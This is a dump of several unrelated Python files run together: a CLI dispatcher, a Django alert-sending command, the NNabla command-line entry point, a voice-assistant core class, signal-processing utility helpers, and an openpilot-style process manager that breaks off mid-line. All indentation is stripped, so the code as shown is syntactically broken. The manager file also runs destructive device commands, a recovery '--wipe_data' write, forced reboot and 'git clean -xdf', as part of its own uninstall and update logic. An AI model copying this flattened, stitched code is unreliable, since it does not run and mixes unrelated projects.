# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_')
and sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e)
exit_code = e.exit_code
sys.exit(exit_code)
sendalerts.py
import time
from threading import Thread
from django.core.management.base import BaseCommand
from django.utils import timezone
from hc.api.models import Check, Flip
def notify(flip_id, stdout):
flip = Flip.objects.get(id=flip_id)
check = flip.owner
# Set the historic status here but *don't save it*.
# It would be nicer to pass the status explicitly, as a separate parameter.
check.status = flip.new_status
# And just to make sure it doesn't get saved by a future coding accident:
setattr(check, "save", None)
tmpl = "Sending alert, status=%s, code=%s\n"
stdout.write(tmpl % (flip.new_status, check.code))
# Set dates for followup nags
if flip.new_status == "down":
check.project.set_next_nag_date()
# Send notifications
errors = flip.send_alerts()
for ch, error in errors:
stdout.write("ERROR: %s %s %s\n" % (ch.kind, ch.value, error))
def notify_on_thread(flip_id, stdout):
t = Thread(target=notify, args=(flip_id, stdout))
t.start()
class Command(BaseCommand):
help = 'Sends UP/DOWN email alerts'
def add_arguments(self, parser):
parser.add_argument(
'--no-loop',
action='store_false',
dest='loop',
default=True,
help='Do not keep running indefinitely in a 2 second wait loop',
)
parser.add_argument(
'--no-threads',
action='store_false',
dest='use_threads',
default=True, # threads are on by default; --no-threads stores False
help='Send alerts synchronously, without using threads',
)
def process_one_flip(self, use_threads=True):
""" Find unprocessed flip, send notifications. """
# Order by processed, otherwise Django will automatically order by id
# and make the query less efficient
q = Flip.objects.filter(processed=None).order_by("processed")
flip = q.first()
if flip is None:
return False
q = Flip.objects.filter(id=flip.id, processed=None)
num_updated = q.update(processed=timezone.now())
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
if use_threads:
notify_on_thread(flip.id, self.stdout)
else:
notify(flip.id, self.stdout)
return True
def handle_going_down(self):
""" Process a single check going down. """
now = timezone.now()
# In PostgreSQL, add this index to run the below query efficiently:
# CREATE INDEX api_check_up ON api_check (alert_after) WHERE status = 'up'
q = Check.objects.filter(alert_after__lt=now).exclude(status="down")
# Sort by alert_after, to avoid unnecessary sorting by id:
check = q.order_by("alert_after").first()
if check is None:
return False
old_status = check.status
q = Check.objects.filter(id=check.id, status=old_status)
if check.get_status(with_started=False) != "down":
# It is not down yet. Update alert_after
q.update(alert_after=check.going_down_after())
return True
# Atomically update status
flip_time = check.going_down_after()
num_updated = q.update(alert_after=None, status="down")
if num_updated != 1:
# Nothing got updated: another worker process got there first.
return True
flip = Flip(owner=check)
flip.created = flip_time
flip.old_status = old_status
flip.new_status = "down"
flip.save()
return True
def handle(self, use_threads=True, loop=True, *args, **options):
self.stdout.write("sendalerts is now running\n")
i, sent = 0, 0
while True:
# Create flips for any checks going down
while self.handle_going_down():
pass
# Process the unprocessed flips
while self.process_one_flip(use_threads):
sent += 1
if not loop:
break
time.sleep(2)
i += 1
if i % 60 == 0:
timestamp = timezone.now().isoformat()
self.stdout.write("-- MARK %s --\n" % timestamp)
return "Sent %d alert(s)" % sent
cli.py
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
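# The CLI runs in a worker thread because the main thread's stack size is
# fixed by the OS/interpreter, while threads created after thread.stack_size()
# get the requested 128 MB stack; combined with the raised recursion limit,
# this lets deeply recursive graph utilities run without overflowing.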
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except Exception:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except Exception:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
core.py
"""Voice Assistant core components."""
import threading
from typing import Any, Callable, Dict, List
import diskcache as dc
from voiceassistant.const import CACHE_DIR
VassJob = Callable[[], None]
class VoiceAssistant:
"""Voice Assistant root class."""
def __init__(self) -> None:
"""Initialize Voice Assistant."""
self._jobs: List[VassJob] = []
self.data: Dict[str, Any] = {}
self.cache: dc.Cache = dc.Cache(CACHE_DIR)
self.load_components()
def load_components(self) -> None:
"""Import and initialize Voice Assistant components.
Importing is done here because we make sure that on every
call this function reloads components' modules too.
Order of initialization matters.
"""
print("*** Loading Components ***")
from voiceassistant.addons import AddonsComponent
from voiceassistant.integrations import IntegrationsComponent
from voiceassistant.interfaces import InterfacesComponent
from voiceassistant.nlp import NaturalLanguageComponent
from voiceassistant.skills import SkillsComponent
self.nlp = NaturalLanguageComponent(self)
self.interfaces = InterfacesComponent(self)
self.skills = SkillsComponent(self)
self.addons = AddonsComponent(self)
self.integrations = IntegrationsComponent(self)
def add_job(self, job: VassJob) -> None:
"""Add job for Voice Assistant to run."""
self._jobs.append(job)
def run(self) -> None:
"""Run Voice Assistant jobs in separate threads."""
for job in self._jobs:
threading.Thread(target=job).start()
__all__ = ["VoiceAssistant"]
misc.py
# -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl='', pl='s'):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else pl
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
"""Help pformat() work properly."""
def __missing__(self, key):
return "{" + key + "}"
def pformat(temp, **fmt):
"""Format a template string partially.
Examples
--------
>>> pformat("{a}_{b}", a='x')
'x_{b}'
"""
formatter = Formatter()
mapping = _FormatDict(fmt)
return formatter.vformat(temp, (), mapping)
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
"""Run command using subprocess.Popen.
Run command and wait for command to complete. If the return code was zero
then return, otherwise raise CalledProcessError.
By default, this will also add stdout= and stderr=subprocess.PIPE
to the call to Popen to suppress printing to the terminal.
Parameters
----------
command : list of str | str
Command to run as subprocess (see subprocess.Popen documentation).
return_code : bool
If True, return the return code instead of raising an error if it's
non-zero.
.. versionadded:: 0.20
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
stdout : str
Stdout returned by the process.
stderr : str
Stderr returned by the process.
code : int
The return code, only returned if ``return_code == True``.
"""
all_out = ''
all_err = ''
# non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
out_q = Queue()
err_q = Queue()
with running_subprocess(command, *args, **kwargs) as p, p.stdout, p.stderr:
out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
out_t.daemon = True
err_t.daemon = True
out_t.start()
err_t.start()
while True:
do_break = p.poll() is not None
# read all current lines without blocking
while True:
try:
out = out_q.get(timeout=0.01)
except Empty:
break
else:
out = out.decode('utf-8')
logger.info(out)
all_out += out
while True:
try:
err = err_q.get(timeout=0.01)
except Empty:
break
else:
err = err.decode('utf-8')
# Leave this as logger.warning rather than warn(...) to
# mirror the logger.info above for stdout. This function
# is basically just a version of subprocess.call, and
# shouldn't emit Python warnings due to stderr outputs
# (the calling function can check for stderr output and
# emit a warning if it wants).
logger.warning(err)
all_err += err
if do_break:
break
output = (all_out, all_err)
if return_code:
output = output + (p.returncode,)
elif p.returncode:
print(output)
err_fun = subprocess.CalledProcessError.__init__
if 'output' in _get_args(err_fun):
raise subprocess.CalledProcessError(p.returncode, command, output)
else:
raise subprocess.CalledProcessError(p.returncode, command)
return output
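# Usage sketch (assumes POSIX 'echo'/'false' on PATH):
#   stdout, stderr = run_subprocess(['echo', 'hello'])
#   stdout, stderr, code = run_subprocess(['false'], return_code=True)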
@contextmanager
def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
"""Context manager to do something with a command running via Popen.
Parameters
----------
command : list of str | str
Command to run as subprocess (see :class:`python:subprocess.Popen`).
after : str
Can be:
- "wait" to use :meth:`~python:subprocess.Popen.wait`
- "communicate" to use :meth:`~python.subprocess.Popen.communicate`
- "terminate" to use :meth:`~python:subprocess.Popen.terminate`
- "kill" to use :meth:`~python:subprocess.Popen.kill`
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
p : instance of Popen
The process.
"""
_validate_type(after, str, 'after')
_check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
if stdxxx not in kwargs:
kwargs[stdxxx] = subprocess.PIPE
# Check the PATH environment variable. If run_subprocess() is to be called
# frequently this should be refactored so as to only check the path once.
env = kwargs.get('env', os.environ)
if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
warn('Your PATH environment variable contains at least one path '
'starting with a tilde ("~") character. Such paths are not '
'interpreted correctly from within Python. It is recommended '
'that you use "$HOME" instead of "~".')
if isinstance(command, str):
command_str = command
else:
command = [str(s) for s in command]
command_str = ' '.join(s for s in command)
logger.info("Running subprocess: %s" % command_str)
try:
p = subprocess.Popen(command, *args, **kwargs)
except Exception:
if isinstance(command, str):
command_name = command.split()[0]
else:
command_name = command[0]
logger.error('Command not found: %s' % command_name)
raise
try:
yield p
finally:
getattr(p, after)()
p.wait()
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming
conventions for old VS new VectorView systems (`remove_whitespace`).
Also it allows to remove system specific parts in CTF channel names
(`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
"""Return all arguments (except self) and values of read_raw_xxx."""
# call stack
# read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
# This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
frame = inspect.currentframe()
try:
for _ in range(3):
frame = frame.f_back
fname = frame.f_code.co_filename
if not fnmatch.fnmatch(fname, '*/mne/io/*'):
return None
args, _, _, values = inspect.getargvalues(frame)
finally:
del frame
params = dict()
for arg in args:
params[arg] = values[arg]
params.pop('self', None)
return params
def sizeof_fmt(num):
"""Turn number of bytes into human-readable str.
Parameters
----------
num : int
The number of bytes.
Returns
-------
size : str
The size in human-readable format.
"""
units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
decimals = [0, 0, 1, 2, 2, 2]
if num > 1:
exponent = min(int(log(num, 1024)), len(units) - 1)
quotient = float(num) / 1024 ** exponent
unit = units[exponent]
num_decimals = decimals[exponent]
format_string = '{0:.%sf} {1}' % (num_decimals)
return format_string.format(quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
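# Quick illustration of the table above:
#   sizeof_fmt(0)       -> '0 bytes'
#   sizeof_fmt(1)       -> '1 byte'
#   sizeof_fmt(1500)    -> '1 kB'    (0 decimals at kB)
#   sizeof_fmt(2500000) -> '2.4 MB'  (1 decimal at MB)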
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _fullname(obj):
klass = obj.__class__
module = klass.__module__
if module == 'builtins':
return klass.__qualname__
return module + '.' + klass.__qualname__
def _assert_no_instances(cls, when=''):
__tracebackhide__ = True
n = 0
ref = list()
gc.collect()
objs = gc.get_objects()
for obj in objs:
try:
check = isinstance(obj, cls)
except Exception: # such as a weakref
check = False
if check:
if cls.__name__ == 'Brain':
ref.append(
f'Brain._cleaned = {getattr(obj, "_cleaned", None)}')
rr = gc.get_referrers(obj)
count = 0
for r in rr:
if r is not objs and \
r is not globals() and \
r is not locals() and \
not inspect.isframe(r):
if isinstance(r, (list, dict)):
rep = f'len={len(r)}'
r_ = gc.get_referrers(r)
types = (_fullname(x) for x in r_)
types = "/".join(sorted(set(
x for x in types if x is not None)))
rep += f', {len(r_)} referrers: {types}'
del r_
else:
rep = repr(r)[:100].replace('\n', ' ')
# If it's a __closure__, get more information
if rep.startswith('<cell at '):
try:
rep += f' ({repr(r.cell_contents)[:100]})'
except Exception:
pass
name = _fullname(r)
ref.append(f'{name}: {rep}')
count += 1
del r
del rr
n += count > 0
del obj
del objs
gc.collect()
assert n == 0, f'\n{n} {cls.__name__} @ {when}:\n' + '\n'.join(ref)
def _resource_path(submodule, filename):
"""Return a full system path to a package resource (AKA a file).
Parameters
----------
submodule : str
An import-style module or submodule name
(e.g., "mne.datasets.testing").
filename : str
The file whose full path you want.
Returns
-------
path : str
The full system path to the requested file.
"""
try:
from importlib.resources import files
return files(submodule).joinpath(filename)
except ImportError:
from pkg_resources import resource_filename
return resource_filename(submodule, filename)
manager.py
#!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
neos_update_required = os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 9)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"mapd": "selfdrive.mapd.mapd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.sh"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"locationd": "selfdrive.locationd.locationd_local",
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"athena": "selfdrive.athena.athenad",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'deleter',
'ui',
'gpsd',
'updated',
'athena'
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'locationd',
'visiond',
'proclogd',
'ubloxd',
'mapd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
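# Example usage (hypothetical name and module path, for illustration only):
#   register_managed_process("exampled", "selfdrive.exampled", car_started=True)
# would add the process to managed_processes and to car_started_processes.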
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
    # can't install the crash handler because sys.excepthook doesn't play nice
    # with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
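# Escalation summary for kill_managed_process: SIGINT (for interrupt_processes)
# or SIGTERM first, then SIGKILL after a 5 second grace period; "unkillable"
# processes instead get 15 more seconds before the phone is force-rebooted.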
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
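# Example (as used in manager_thread below):
#   system("am start -n ai.comma.plus.frame/.MainActivity")
# logs the command, discards its output, and logs an event on failure.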
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.18:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
for p in running:
cloudlog.debug(" running %s %s" % (p, running[p]))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
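# Example of the returned mapping (the path is illustrative only):
#   {"ai.comma.plus.offroad": "/data/app/ai.comma.plus.offroad-1/base.apk"}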
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.keys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
